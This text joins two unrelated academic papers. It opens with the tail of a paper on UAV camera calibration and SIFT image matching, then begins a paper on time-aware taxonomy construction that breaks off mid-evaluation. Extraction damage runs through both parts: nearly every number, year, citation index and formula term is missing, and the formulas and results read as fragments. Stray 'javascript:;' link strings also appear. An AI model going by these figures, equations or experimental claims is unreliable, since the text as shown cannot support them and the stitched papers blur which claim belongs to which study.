error of aerial image. the camera focal length used in this system is fixed, so the distortion difference is the systematic error, which produces the same image for all the collected images. the inspection of camera can adopt the methods of optical laboratory inspection, laboratory inspection and on-duty inspection. at present, the main test method is laboratory test. the experimental field is composed of some mark points of known space coordinates. in the process of check and correct, the experimental field is photographed by the camera under check, and the internal azimuth elements and other elements affecting the shape of the beam are solved according to the method of single space resection or multi-space resection [ ]. in d experimental campus, the system uses uav digital camera easy calibrate to check and correct the digital camera sonyrx ), table shows the detection results and contents, with the origin of coordinates at the lower left corner of the image. table i. the calibration results of sony rx camera content of check calibration value remark x - . mm the element of camera internal azimuth y - . mm f(focal distance) . k (radial distortion factor) . e- the coefficient of radial distortion k (the factor of radial distortion) - . e- p (the factor of eccentricity distortion) . e- tangential distortion coefficient p (the factor of eccentricity distortion) - . e- image distortion correction -- indirect method. this method uses the coordinates on the corrected image to calculate the image coordinates of the corresponding points on the original image, and combines the gray interpolation method to realize image correction [ ], as shown in figure . figure . image distortion correction schematic diagram javascript:; javascript:; javascript:; javascript:; international journal of advanced network, monitoring and controls volume , no. , after years of research, the calculate the deformation correction models getting thrown the error correction model), the model of error correction is:   : image point coordinates x_ and y_ with image center as the origin: main point coordinates picture.  :coefficient of radial distortion :coefficient of tangential distortion :non-square scaling factor of pixels :the no orthogonal error coefficient of ccd array arrangement. the space resection method is used to calculate the coordinates of the camera in photography, which improves the precision of high external square elements and the precision of geometric calibration [ ]. the precise control of uav attitude is mainly timely adjusted through the acquired signals of the attitude sensor, which generally includes two types: the angle sensor and the angular velocity sensor,the dip sensor is implemented indirectly by an acceleration sensor from three directions, the output signal values represent the current three axial acceleration values, if the uav hovers in the air and stays still when the actual geological aerial measurement is made, then obtained acceleration value can be easily converted to obtain the real dip parameter [ ]. it is impossible for a drone to remain stationary in the air for a long time in practical applications, when there is wind, the uav may deviate from a certain direction when it is disturbed. even if the uav remains in a horizontal direction, the output value of the acceleration sensor will still deviate from the central value, resulting in the misjudgment value given by the control center. to avoid this kind of situation, often need to introduce three axis in the practical measuring angular velocity sensor and ultrasonic range finder, according to the three axis get up the acceleration and angular velocity and the z axis direction real-time highly value the rate of change of the acceleration of x, y axis direction, so as to draw close to actual information of the real angle [ ]. iii. uav image matching in most cases, the uav image mapping method adopts the image matching technology, which recognizes the eponymous point between two images or multiple images through corresponding matching algorithm. the common matching methods mainly include the following two categories: one is based on grayscale matching, the other is based on feature matching [ ]. in the actual measurement in this paper, sift feature matching algorithm, which is most commonly used in feature matching mode, is adopted for high-precision matching of massive data. sift matching algorithm adopts the matching based on local feature values of the image [ ]. this algorithm holds invariance for translation, rotation occlusion, etc. therefore, it has strong stability in actual use. the feature matching process is shown in figure . figure . feature matching flow chart international journal of advanced network, monitoring and controls volume , no. , a. pyramid image pyramid image refers to the process of decomposing the original image to obtain a series of sub-images with different resolutions. these images are sorted from small to large according to the resolution, forming a group of overlapping pyramid-like images. the matching point is found in the top image, and the matching position is taken as the predicted position of the next layer. the matching result of this layer is taken as the initial matching position of the next layer, and then the matching is conducted successively. the matching result is used as control to match other feature points [ ]. this process from top to bottom, from coarse to fine, ensures the reliability of image search process. in the pyramid image structure, the image is represented by hierarchical structure. at the top of the pyramid structure, data is stored at the lowest resolution possible, as the number of pyramid layers increases, the resolution of the data decreases successively. at the bottom of the pyramid, the data with the highest resolution can be stored to meet the needs of users [ ]. in this way, different layers and different resolutions are adopted to store and display according to the needs of users, forming a pyramid structure with a higher resolution to a lower one and a smaller data volume to a larger one. this image pyramid structure is a typical hierarchical data structure used for image coding and progressive image transmission [ ]. it is suitable for multi-resolution organization of raster data and image data and is also a lossy compression square of raster data or image data. b. image feature point extraction feature extraction refers to using a computer to present the image information of the same name in the image, which determines the common features in the image [ ]. image feature extraction generally depends on the distribution of gray in the image, and the position shape and size of features are determined through the information. sift feature matching algorithm consists of two parts [ ]. the vector features are extracted from multiple images;sift is used to match feature vectors. scale space representation is an expression based on region. scale space is defined as the product of gaussian convolution kernel and remote sensing image. through the derivation of koendetink and babaud, it is proved that gaussian kernel is the only linear kernel to realize scale transformation)[ ]。  in formula , l(x, y, σ) is the scale space, is the gaussian convolution kernel , is the remote sensing image, x, y, σ are respectively represented by position parameters and scale parameters. the smaller the scale space factor is, the smaller the scale is.  after defining the scale space, the scale space function can be used to build the gaussian pyramid model, the scale proportion between two adjacent layers and the same rank pyramid affect the scale space function defined between two adjacent layers [ ]. the scale between adjacent layers is defined as k, define the scale factor as σ), is the differential gaussian pyramid function. at last, each sample point is compared with the adjacent points in the corresponding positions of the upper and lower scale space around the same scale space. if the detection point is local maximum or minimum, it is a candidate point of the image in this scale [ ]. iv. the experimental test this experiment adopts the uav model for the average inspire v . aerial vehicle four axis, the main parameters international journal of advanced network, monitoring and controls volume , no. , including the maximum altitude of meters, maximum rising speed of m/s, the maximum level flight speed of m/s, maximum pitching angle ° m/s wind power, aircraft cabin image sensor using sony exmor / . )。the image device used in this experiment is cannon d mark ii, the image size is * mm. install visual studio on your laptop and configure open cv for experimental testing, using c++ to achieve sift image feature point extraction, the matching method is two dimensional feature point brute force matcher, set a certain threshold to filter the matching results, using find homography function to set ransac method to eliminate error matching, sift was tested according to the above steps to understand its performance, and the performance was obtained as shown in table . table ii. features matching performance table sift+bfmatch image extraction point / time to generate the descriptor ms match the time ms threshold extraction points filter after mismatched points the experimental results show that the method has a reasonable matching time. after filtering the threshold value and the basic matrix, the points basically cover the key area of the image. the pixel distribution is uniform with the low error. the system can meet the matching requirements, and the matching test image is shown in figure . the accuracy rate of the experimental matching is . %. if the image is improved with light effect, the accuracy can reach . %. therefore, this research method has good anti-interference and high stability, and can be widely used in low-altitude image matching with interference factors. figure . feature matching experiments v. conclusion based on the preprocessing theory of aerial survey images, this paper studies the extraction method of image features and uses visual c++ to realize sift extraction of image feature points. brute force matcher, a two-dimensional feature point matching method, was selected for image region matching, use the find homography function to set the ransac method to eliminate false matches, in this method, the matching accuracy was . %~ . % (according to the scene illumination) through the experiment of the geological and geomorphological images of a certain scene, and relatively satisfactory matching effect was obtained. however, due to the deficiencies of uav itself, it is difficult to compare with professional image processing system. with the further development of communication technology and control technology, uav will have a breakthrough application and development prospect in low-altitude measurement field in the future. reference [ ] song wenping. research on integration of low altitude remote sensing system of uav and related questions of image date processing[d].xi’an: chang’an university, . : . [ ] li yifei. research on pid control in quad rotorcraft[j].technology and market, . : . international journal of advanced network, monitoring and controls volume , no. , [ ] wang jianxiong. study of the key technology of low altitude phootogrammetry of unmanned aerial vehicle and the practice of large scale topography formation[d].xi’an: chang’an university, . : . [ ] yu huai, yang wen. a fast feature extraction and matching algorithm for uva[j].journal of electronic &information technology, . : . [ ] d. g. lowe. distinctive image features from scale-invariant key points[j]. international journal of computer vision, , ( ): . [ ] li xiang, wang yongjun, li zhi. inter- triadmisalignment of vector field sensors in attitude and heading reference systems and its calibration[j]. chinese journal of sensors and actuators, . : - [ ] tan xiong, yu xuchu, liujingzheng, huang weijie. object fast tracking based on unmanned aerial vehicle video[c]// proceedings of paciia, ieee presss, : . [ ] wang donghua, yue dawei. design and implementation of large remote sensing image correction test system [j]. computer programming skills & maintenance, . : . [ ] liu yawei. the review of uav target detection and tracking method[j]. aerodynamic missile journal, ,( ): - . [ ] d. g. lowe. distinctive image features from scale-invariant key points[j]. international journal of computer vision. , ( ). [ ] cui zhe. image’s characteristic point extraction and matching based on sift algorithm[d].chengdu: university of electronic science and technology of china. . : - . [ ] lu xiaopan. empirical study on the mapping precision based on uav low-altitude photogrammetry[d].beijing: china university of mining and technology. . : - . javascript:void( ) utilizing temporal information for taxonomy construction luu anh tuan ∗ , siu cheung hui † , see kiong ng # ∗institute for infocomm research, singapore at.luu@i r.a-star.edu.sg †school of computer engineering, nanyang technological university, singapore asschui@ntu.edu.sg #institute of data science, national university of singapore seekiong@nus.edu.sg abstract taxonomies play an important role in many applications by organizing domain knowledge into a hierarchy of ‘is-a’ relations between terms. previous work on automatic construc- tion of taxonomies from text documents ei- ther ignored temporal information or used fixed time periods to discretize the time se- ries of documents. in this paper, we pro- pose a time-aware method to automatically construct and effectively maintain a taxon- omy from a given series of documents pre- clustered for a domain of interest. the method extracts temporal information from the docu- ments and uses a timestamp contribution func- tion to score the temporal relevance of the evidence from source texts when identifying the taxonomic relations for constructing the taxonomy. experimental results show that our proposed method outperforms the state- of-the-art methods by increasing f-measure up to %- %. furthermore, the proposed method can incrementally update the taxon- omy by adding fresh relations from new data and removing outdated relations using an in- formation decay function. it thus avoids re- building the whole taxonomy from scratch for every update and keeps the taxonomy effec- tively up-to-date in order to track the latest in- formation trends in the rapidly evolving do- main. introduction the explosion in the amount of unstructured text data gives us the opportunity to explore knowledge in depth, but there are also challenges to recog- nize useful information for our interests. to pro- vide access to information effectively, it is impor- tant to organize unstructured data in a structured and meaningful manner. taxonomies, which serve as backbones for structured knowledge, are use- ful for many nlp applications such as question answering (harabagiu et al., ) and document clustering (fodeh et al., ). however, hand- crafted, well-structured taxonomies such as word- net (miller, ), opencyc (matuszek et al., ) and freebase (bollacker et al., ), which are pub- licly available, can be incomplete for new or special- ized domains. as it is time-consuming and cum- bersome to create a new one manually, methods for automatic domain-specific taxonomy construc- tion from text corpora are highly desirable. previous work on automatic construction of domain-specific taxonomies from text documents assumed that the data sets (that is, the document sets) and the underlying taxonomic relations are static. however, the data sets for certain domains may evolve over time, as new documents are added while older documents are deleted or modified. as such, the taxonomic relations for these potentially fast-changing domains may not remain static but become dynamic over time as new domain terms emerge while some older ones disappear. for ex- ample, in world health organization reports about disease outbreak, the term ‘smallpox’ used to be a hyponym of ‘dangerous disease’, but it has fallen off since . on the other hand, since the term ‘ebola’ has become an emerging hyponym of ‘dan- gerous disease’. as another example, up until , in a collection of us yearly reports of terrorism, the term ‘palestine liberation organization’ used to be a hyponym of ‘terrorist group’, but it is no longer true nowadays. ‘palestine liberation organization’ should now be classified as a ‘national organization’ of palestine. when temporal information in data sets is not captured, the resultant taxonomy may be incom- plete or outdated and misleading. this could be caused by the overwhelming evidence of older pat- terns/contexts compared to emerging, but relatively transactions of the association for computational linguistics, vol. , pp. – , . action editor: bo pang. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. small amount of, evidence of newer relations. for example, in the taxonomy of us yearly reports on terrorism, many previous methods could fail to rec- ognize the taxonomic relation between the two terms ‘isis’ and ‘terrorist group’ due to relatively infre- quent mentions of ‘isis’ (which only appears in re- ports from ). meanwhile, ‘palestine liberation organization’ could still be classified as a hyponym of ‘terrorist group’ because of the relatively larger number of mentions in the documents from the ear- lier years. in this paper, we propose a time-aware method for domain-specific taxonomy construction from a time series of text documents for a particular do- main. we incorporate temporal information into the process of identifying taxonomic relations by com- puting evidence scores for the data sources weighted by a timestamp contribution function (efron and golovchinsky, ; li and croft, ) to cap- ture the temporally-varying contributions of evi- dence from various documents at a particular point in time. we assume that newer evidence is more im- portant than older evidence. for example, the evi- dence that ‘palestine liberation organization’ was a hyponym of ‘terrorist group’ in is less im- portant now than the evidence that ‘isis’ is a hy- ponym of ‘terrorist group’ in . in the proposed method, we incorporate the timestamp contribution function into the method of tuan et al. ( ) to measure the weights of the evidence for both sta- tistical and linguistic methods. with such built-in time-awareness for taxonomy construction, we en- sure that the constructed taxonomies are up-to-date for the fast-changing domains found in newswire and social media, where users constantly search for updated relations and track information trends. most previous work requires re-running the tax- onomy construction process whenever there are new incoming data. our proposed method enables in- cremental update of the constructed taxonomies to avoid costly reconstructions. we incorporate an information decay function (smucker and clarke, ) to manage outdated relations in the con- structed taxonomy. the decay function measures the extent that the relation is out-of-date over time, and we incorporate it into a time-aware graph-based al- gorithm for taxonomy update. the contributions of our research are summarized as follows: • we propose a time-aware method for taxon- omy construction that extracts and utilizes tem- poral information to measure evidence weights of taxonomic relationships. our method con- structs an up-to-date taxonomy by adding new emerging relations and discarding obsolete and incorrect ones. • we propose an incremental time-aware graph- based algorithm to update an existing taxon- omy, instead of rebuilding a new taxonomy from scratch. related work previous work on taxonomy construction can be roughly divided into two main approaches: statis- tical learning and linguistic pattern matching. sta- tistical learning methods for taxonomy construc- tion include co-occurrence analysis (lawrie and croft, ), hierarchical latent dirichlet alloca- tion (lda) (blei et al., ), clustering (li et al., ), term embedding (tuan et al., ), linguis- tic feature-based semantic distance learning (yu et al., ), and co-occurrence subnetwork mining (wang et al., ). supervised statistical methods (petinot et al., ) rely on hierarchical labels to learn the corresponding terms for each label. the labeled training data, however, are costly to obtain and may not always be available in practice. un- supervised statistical methods (pons-porrata et al., ; li et al., ; wang et al., ) are based on the idea that terms that frequently co-occur may have taxonomic relationships. however, these meth- ods generally achieve low accuracy. linguistic approaches for taxonomy construction rely on lexical-syntactic patterns (hearst, ) (e.g., ‘a such as b’) to capture textual expressions of taxonomic relations, matching them with given documents or web information to identify the rela- tions between a term and its hypernyms (kozareva and hovy, ; navigli et al., ; wu et al., ). these patterns can be manually created (wu et al., ) or automatically identified (navigli et al., ). such linguistic pattern matching meth- ods can generally achieve higher precision than the statistical methods, but they suffer from lower cov- erage. to balance precision and recall, zhu et al. ( ) and tuan et al. ( ) have combined both unsupervised statistical and linguistic methods to input documents & web data temporal information processing sentence timestamp domain term extraction taxonomic relation identification taxonomy induction existing taxonomy (new) taxonomy taxonomy construction figure : workflow of the proposed time-aware taxonomy construction method. find taxonomic relations. the approach that is closest to our work is the one proposed by zhu et al. ( ), which performs dynamic taxonomy update. to keep up with ever changing social media data, new terms are mined from incoming data and added to the existing tax- onomy. the data are divided into separate clusters using pre-defined time periods based on their docu- ment timestamps. the newly found taxonomic re- lations in each period are then added to the exist- ing taxonomy. the use of a pre-defined time pe- riod to discretize the time series of the documents for taxonomy update can be problematic. if the cho- sen time period is too long, rapid changes of do- main terms and their taxonomic relations that have occurred within the time period may not be reported. if the time period is too short, it may fail to identify valid taxonomic relations that needed a longer time period to establish. the method also does not re- move those relations in the existing taxonomy that may have become obsolete over time. problem specification we define the root term of a domain-specific taxon- omy as a word or phrase that represents the domain of interest. it can be any informative concept such as an entity (‘animal’) or event (‘ebola outbreak’). given a root term r, we define a corpus c as a pre- clustered set of a time series of text documents ac- cording to r. given two terms t and t , we denote t → t as a taxonomic relation where t is a hypernym of t . in this work, we define a taxonomy as a triple h = (v,e,s), where: • v is the set of the taxonomy’s vertices, i.e., the set of terms, including the root term. • e is the set of the taxonomy’s edges, i.e., the set of taxonomic relations. • s is the creation time of the taxonomy. it can be the current date or any specified time. our task is formally defined as follows: given a root term r, a corpus c and an optional existing taxonomy h = (v ,e ,s ) constructed at time s , we aim to build a new taxonomy h = (v ,e ,s ) at time s , where s > s , so that we can process the document set in c up to time s into the relevant terms in the taxonomy. if h does not exist, the problem becomes cre- ating a taxonomy h for corpus c. otherwise, the problem is to update the existing taxonomy with the newly obtained data for corpus c. note that while the taxonomy construction method is not a totally unsupervised method as it does require as input a corpus (c) pre-clustered by a domain of interest (i.e., r), the subsequent steps for constructing the taxon- omy given the text corpus are unsupervised. methodology figure shows the workflow of the proposed time- aware taxonomy construction method. there are two key processes in the proposed method: temporal information processing and taxonomy construction. . temporal information processing the aim of the temporal information processing pro- cess is to generate temporal information (or times- tamp for short) for each sentence in the input docu- ment or web data. previous taxonomy construction methods (zhu et al., ) only extract temporal information at the document level, i.e., all information in the document has the same timestamp as the document creation date. this assumption, however, is not always cor- rect. figure shows a sample report about the flight mh created on july . in this report, the timestamp of each sentence is very different from the document creation date. if we were to simply use the temporal information at the document level, the timestamps for the search areas of mh at dif- ferent periods will be incorrect. thus, we propose a figure : a sample report about the flight mh created on july . method to extract timestamps (i.e., temporal expres- sions) at the sentence level. the method comprises the following three steps: document creation date extraction: first, we ex- tract the timestamp at the document level. the text corpus that we are using for this study consists of a collection of reports, scientific publications and web search results. for the first two types of documents, the timestamp is the document creation date that can be extracted directly from the data source, i.e., the date of the report, or the date of the publication. for web search results, we use google advanced search with customized time range which returns the search results together with their creation dates at the begin- ning of search snippets. temporal expression extraction: next, the sec- ond step proceeds to extract all temporal expressions (e.g. “ december ”) in the document. here, we use sutime (chang and manning, ), a li- brary for recognizing and normalizing time expres- sion using a deterministic rule-based method. the output of this step is a list of time expressions, to- gether with their positions in the document. sentence timestamp extraction and normaliza- tion: finally, in the third step, we assign each sen- tence in the document a time expression as follows: • first, we assign a temporal value τ as the doc- ument creation date. • for each sentence s in the document: – if s contains a temporal expression τ , assign τ as the timestamp of s and update τ = τ . – otherwise, assign τ as the timestamp of s. note that we use the format ‘yyyy-mm-dd’ for the temporal expression. if the information of dd or mm is missing, it is replaced with the first day or first month respectively. for example, ‘december ’ will be normalized as ‘ - - ’. using the proposed method, sentence ( ) and sentence ( ) in the example of figure will have the same times- tamp of ‘ - - ’, while sentence ( ) will have the timestamp of ‘ - - ’. in section . , we will show that the extraction of timestamps at the sentence level will improve the performance of the proposed taxonomy construction method as compared to the extraction of timestamps at the document level. . taxonomy construction there are three general steps to constructing a tax- onomy: domain term extraction, taxonomic relation identification, and taxonomy induction. we make use of the taxonomy construction method of tuan et al. ( ) for the first step, incorporate times- tamps into the second step of identifying taxonomic relations (section . . ), and propose an incremen- tal taxonomy induction algorithm for the third step (section . . ). as extraction of domain term ex- traction does not affect the temporal aspects of tax- onomy construction, the first step of domain term extraction is not within the scope of this study. the reader can refer to tuan et al. ( ) or zhu et al. ( ) in which linguistic approaches to extract do- main terms are discussed. in this paper, we assume that the list of domain terms is available and we will focus only on discussing the second and third steps for taxonomy construction. . . taxonomic relation identification in this section, we give an overview of the method to identify taxonomic relations proposed in tuan et al. ( ). given an ordered pair of two terms t and t , tuan et al. ( ) calculates the evidence score that t → t based on the following three methods: syntactic contextual subsumption (scs): this method derives evidence for t → t from their syn- tactic contexts, particularly from triples of the form (subject,verb,object). it is observed that if the context set of t mostly contains that of t but not vice versa, then t is likely to be a hypernym of t . to implement this idea, the method finds the most common relation (or verb) r of t and t , submits the queries “t r” and “t r” to web search engine and collects all search results to construct two corpora corpusΓt and corpus Γ t for t and t . the syntac- tic context sets are then created from these contex- tual corpora using a non-taxonomic relation identifi- cation method. the details of scorescs(t , t ) can be found in tuan et al. ( ). lexical-syntactic pattern (lsp): this method is to find how much more evidence for t → t is found on the web than for t → t . specifically, a list of manually constructed taxonomic patterns (e.g., “t is a t ”) is queried with a web search engine to es- timate the amount of evidence for t → t from the web. the lsp measure is calculated as follows: scorelsp (t , t ) = log(|cweb(t , t )|) + log(|cweb(t , t )|) where cweb(t , t ) denotes the set of search results. string inclusion with wordnet (siwn): this method is to check the evidence for t → t by using the combination of string inclusion and references in wordnet synsets. scoresiwn(t , t ) is set to if there is such evidence; otherwise, it is set to . combined evidence: the three scores are then combined linearly as follows: score(t , t ) = α×scorescs(t , t ) + β ×scorelsp (t , t ) + γ ×scoresiwn(t , t ) if score(t , t ) is greater than a threshold value, then t is regarded as a hypernym of t . . . incorporating temporal information into taxonomic relation identification previous studies of taxonomic relation identifi- cation treated all evidence equally, i.e., evidence from is treated equally with evidence from . this assumption is not always appropriate, as discussed in section . we propose a time-aware method to identify taxonomic relations by incorpo- rating timestamps into the process of finding evi- dence, using the following timestamp contribution function: definition (timestamp contribution function). given a text sentence d with timestamp sd, the times- tamp contribution of d at time s is defined as: td(s ) = ξe −ξ(s −sd), ( ) where ξ is a control rate, s > sd and (s − sd) is the time lapse between sd and s . equation ( ) describes the timestamp contribution of a sentence at a specific time by using an expo- nential distribution function td. the intuition be- hind this function is that the evidence of taxonomic relations found in more recent sentences will be of higher relevance than that found in older sentences. this function is inspired by the work of efron and golovchinsky ( ), and li and croft ( ), in which it was used to effectively rank documents over time intervals. using the timestamp contribution function, we in- corporate temporal information into the three taxo- nomic relation identification methods described in section . . , as follows: lsp method: for each search result snippet d in cweb(t , t ) collected from the web search engine, we calculate the timestamp contribution score of d by using td: td(s ) = ξe−ξ(s −sd), where s is a chosen specific time (i.e., the time of taxonomy con- struction) and sd is the timestamp of d. note that sd has to be earlier than s . the unit of time lapse (s −sd) depends on the nature of corpus and can be, for instance, a day, a month or even a year. for ex- ample, if the corpus is from a fast-changing source such as social media, we can set the unit as day to keep up with the change of data on a daily basis. in contrast, for a corpus from slower changing domains such as scientific disciplines, the unit can be a year. the time-aware score for the lsp method is calcu- lated as follows: score time lsp (t , t ) = scorelsp (t , t ) × ∑ d∈cw eb(t ,t ) td(s ) |cweb(t , t )| ( ) in equation ( ), the original lsp evidence score is multiplied by the average timestamp contribution score of all evidence sentences for the taxonomic re- lation from the web. if the number of the returned search results is too large, we will use only the first , results to estimate the average timestamp con- tribution of evidence. note that the total timestamp contribution score of all evidence sentences ∑ d∈cweb(t ,t ) td(s ) can be considered as the “weighted size” of cweb(t , t ), i.e., we weigh each evidence sentence using equa- tion ( ) and sum all these weights. however, if we use only the “weighted size” of cweb(t , t ) for the time-aware score scoretimelsp (t , t ), there will be some issues. firstly, the score scoretimelsp will not be normalized with respect to the number of evi- dence sentences. this may lead to potential bias due to large amounts of past evidence—if there were an obsolete or incorrect taxonomic relation with many evidence sentences in the past, it may overwhelm the new taxonomic relations which may only have a small number of recent evidence sentences. sec- ondly, if we normalize the score, the information on the number of evidence sentences, which is im- portant for the lsp method to recognize true taxo- nomic relationships, will be lost. therefore, we pro- pose to use equation ( ), which combines both in- formation on the number of evidence sentences (em- bedded inside the original scorelsp score) and the normalized “weighted size” of cweb(t , t ). scs method: similarly, for each search result snip- pet d in corpusΓt and corpus Γ t , we calculate the timestamp contribution score of d using the function td: td(s ) = ξe−ξ(s −sd), where s is a specific time and sd is the timestamp of d. the time-aware score for scs method is calculated as follows: score time scs (t , t ) = scorescs(t , t ) × ( ∑ d ∈corpusΓt td (s ) |corpusΓt | + ∑ d ∈corpusΓt td (s ) |corpusΓt | ) ( ) in equation ( ), the original evidence score of t → t is multiplied by the average timestamp con- tribution scores of the returned search snippets. sim- ilar to equation ( ), equation ( ) combines both in- formation on the number of evidence sentences (em- bedded inside the original score scorescs) and the normalized “weighted size” of them. siwn method: because wordnet does not contain information about timestamps, we set: score time siwn(t , t ) = scoresiwn(t , t ) ( ) combined evidence: the final combined evidence score for the time-aware method is calculated as: score time (t , t ) = α×scoretimescs (t , t ) + β ×scoretimelsp (t , t ) + γ ×scoretimesiwn(t , t ) ( ) if the value scoretime(t , t ) is greater than a threshold value, we extract the relation t → t . . . parameter learning we need to estimate the optimal values for the pa- rameters α, β and γ which are used in equation ( ). for this purpose, we apply ridge regression (hastie et al., ). first, we use the time-aware method to create taxonomies for the ‘animal’, ‘plant’ and ‘ve- hicle’ domains using corpora constructed by a boot- strapping method (kozareva et al., ). then, we ask two annotators to construct gold standard tax- onomies of the three domains (see section . for more details) and use them to build the training sets. for each pair of terms (t , t ) found in the gold stan- dard taxonomies, its evidence score is estimated as (τ+ ), where τ is the threshold value for scoretime. finally, we use equation ( ) to learn the best combi- nation of α, β and γ using the ridge regression algo- rithm. note that we learn the parameters only once and use them subsequently for the other domains. . . incremental taxonomy induction to avoid reconstructing a taxonomy whenever there is new incoming data, we propose a novel in- cremental graph-based algorithm to update an exist- ing taxonomy with a given set of taxonomic rela- tions. the proposed algorithm updates a taxonomy automatically over time based on the information decay function defined below. definition (information decay function). given a taxonomic relation r, the information decay of r over the period from time s to time s is computed by the information decay function: dr(s ,s ) = e −λ(s −s ), ( ) where λ is a decay rate and s > s . the intuition behind the information decay func- tion is that the evidential value of a relation will de- crease over time at an exponential rate. given a root node r, a set of taxonomic rela- tions t and, optionally, an existing taxonomy h = (v ,e ,s ) created at time s with vertex set v and edge set e , the proposed graph-based algorithm constructs a new taxonomy h = (v ,e ,s ) cre- ated at time s with vertex set v and edge set e . t → t denotes the edge from t to t in a taxon- omy, and w(t → t ) as the weight of this edge (i.e., evidence score). algorithm consists of four steps: step : update existing taxonomy (lines - ) this step aims to update the existing taxonomy from algorithm taxonomy induction algorithm input: r: root node of taxonomy; t : new taxonomic relation set; h = (v ,e ,s ): existing taxonomy created at time s with vertex set v and edge set e ; output: h = (v ,e ,s ): new taxonomy created at time s with vertex set v and edge set e ; : set v = v and e = e : for each edge (t → t ) ∈e , t = r and t = r do : w(t → t ) = w(t → t ) ×e−λ(s −s ) : end for : for each relation (t → t ) ∈t do : if (t → t ) ∈e then : w(t → t ) = w(t → t ) + scoretime(t , t ) : else : e = e ∪ (t → t ) : w(t → t ) = scoretime(t , t ) : if t ∈ v then : v = v ∪{t } : end if : if t ∈ v then : v = v ∪{t } : end if : if @ (t → t ) ∈e and t = r then : e = e ∪ (r→ t ) : w(r→ t ) = : end if : if ∃ (r→ t ) ∈e then : e = e \ (r→ t ) : end if : end if : end for : edgefiltering(h ); : graphpruning(h ); time s to s . in this step, the weight of each edge (t → t ) in e (except the edges connected to root r) is reduced using the information decay function: w(t → t ) = w(t → t )×dt →t (s ,s ) step : add new relations to existing taxonomy (lines - ) this step adds new taxonomic relations to the existing taxonomy and updates their weights. it adds each relation t → t as a directed edge from the parent node t to child node t if this edge does not exist in the existing taxonomy. otherwise, we update the weight of this edge with a new evidence score. if t does not have any parent node, t will become a child node of root r. the edge’s weight is updated as follows: w(t → t ) =    if t = r w(t → t ) + scoret ime(t , t ) if t →t ∈ e scoret ime(t , t ) otherwise the result of this step is a weighted connected graph containing all taxonomic relations with root r. step : edge filtering (line ) the graph gener- ated in step contains some edges with low evi- dence scores. the reason is that some relations in the existing taxonomy can become outdated during the period from s to s (according to the informa- tion decay function), and they do not exist in the new relation set. in this step, each edge t → t in the graph is revisited, and if its weight is lower than the threshold value of scoretime, it will be removed from the graph. in the case that t does not have any other parent node except t , t will be deleted from the vertex set, and edges from t to t ’s chil- dren will be added to the edge set with weights that are equal to the weights of the edges from t to t ’s children. then, all edges from t to t ’s children will be removed from the edge set. step : graph pruning (line ) the graph gener- ated in step is not an optimal tree as it may con- tain redundant edges or incorrect edges—for exam- ple, those edges that form a loop in the graph. this step aims to produce an optimal tree of the taxon- omy from the weighted graph in step . for this purpose, we apply edmonds’ algorithm (edmonds, ) for finding the optimal spanning arborescence for a weighted directed graph. using this algorithm, we can find a subset of the current edge set that forms a taxonomy where every non-root node has in-degree and the sum of the edge weights is max- imized. performance evaluation we have conducted two experiments for perfor- mance evaluation. the first experiment evaluates the performance of our proposed time-aware method on constructing a taxonomy from a given list of terms without any prior knowledge (i.e., without any exist- ing taxonomies). the second experiment evaluates the performance of our proposed method on taxon- omy update. . datasets we evaluate our method for taxonomy construction based on the following four datasets of document collections obtained from different domains: • artificial intelligence (ai) domain (navigli et al., ): the corpus is about the root term ‘artificial intelligence’, consisting of , papers extracted from the ijcai proceedings from to and the acl archives from year to . • mh domain: the corpus is about the root term ‘issues related to mh search’. mh is the missing flight that went down in the ocean on saturday, march . the corpus is created by querying the google search en- gine with the keyword “mh ” from march , to april , and collecting the first documents from the search results each day. after removing duplicates, the cor- pus contains a total of , documents. • terrorism domain: the corpus is about the root term ‘terrorism’. it contains reports from “patterns of global terrorism ( - )” and “country reports on terrorism ( - )” of the us state department. each re- port contains about , words. • disease domain: the corpus is about the root term ‘disease outbreak’, created by collecting reports from “disease outbreaks by year from to ” of who, and the email archive of promed which is an email based reporting system dedicated to reporting on disease out- breaks that affect human health. the corpus contains a total of , reports/emails. parameter settings. for the rapidly changing do- main ‘mh ’, we choose ‘day’ as the unit of the time lapse whereas for the other three domains, we use ‘year’ as the time lapse unit. we set the thresh- old value of scoretime in equation ( ) as . , and the control rate ξ in equation ( ) and decay rate λ in equation ( ) as . . the setting of these parameters will be discussed in section . . . evaluation on taxonomy construction . . experiment in this experiment, we compare our time-aware taxonomy construction method with other state-of- the-art methods in the task of constructing a new taxonomy from a given list of terms without any prior knowledge (i.e., without any existing taxon- omy). three state-of-the-art methods in the litera- ture are selected for comparison: http://www.fas.org/irp/threat/terror.htm http://www.state.gov/j/ct/rls/crt/index.htm http://www.who.int/csr/don/archive/year/en/ http://www.promedmail.org/ • zhu’s method (zhu et al., ): it constructs the taxonomy using evidence from multiple sources such as wordnet, wikipedia and web search engines. in their method, both statisti- cal and linguistic approaches are used to infer taxonomic relations. • kozareva’s method (kozareva and hovy, ): it constructs the taxonomy using evi- dence from a web search engine by matching the search results with a predefined set of syn- tactic patterns. • tuan’s method (tuan et al., ): it is the non time-aware method described in section . . . this method ignores temporal information dur- ing taxonomy construction. to evaluate the effectiveness of extracting times- tamps at the sentence level (as described in section . ), we also conduct an experiment on a setting that uses the timestamps out the document level (i.e., all evidence in the document will have the same times- tamp information as the document creation date). we use the subscript docstamp to denote this setting. . . evaluation metric in this experiment, we evaluate the constructed taxonomies against the manually created gold stan- dard taxonomies. the gold standard taxonomies are created as follows. for each domain, two annotators are employed at the same time to create taxonomies independently using the list of terms obtained from the domain term extraction module, according to the following rules: • rule (relevancy): every term in the taxon- omy should be related to the root term. • rule (appropriateness): each edge between two terms should be established at the time the taxonomy is created, if their relation is correct and not obsolete. a relation is obsolete if it is invalid at the time of consideration. • rule (hierarchical structure): the gold stan- dard taxonomy of each domain should form a tree, without redundant paths or cycles. the annotators then compare their constructed taxonomies. a taxonomic relation t → t is counted as an agreement if and only if both an- notators have t and t in their taxonomies, and there is a directed path from t to t . if an anno- tator has a taxonomic relation with one vertex not domain number of vertices average depth mh . ai . terrorism . disease . table : analysis of gold standard taxonomies. in the other annotator’s taxonomy, it will be consid- ered as a disagreement. after evaluation, the aver- age inter-annotator agreement on edges of the con- structed taxonomies between the two annotators is % using cohen’s kappa coefficient measurement. finally, the two annotators discuss to come up with the gold standard taxonomies. as a result, the num- ber of nodes and average depth of the taxonomies are summarized in table . we use precision, re- call and f-measure to measure the performance of taxonomy construction. let r and rgold be the set of taxonomic relations of our constructed taxonomy and the gold standard taxonomy respectively; then the metrics are given as follows: precision = |r∩rgold| |r| ; recall = |r∩rgold| |rgold| 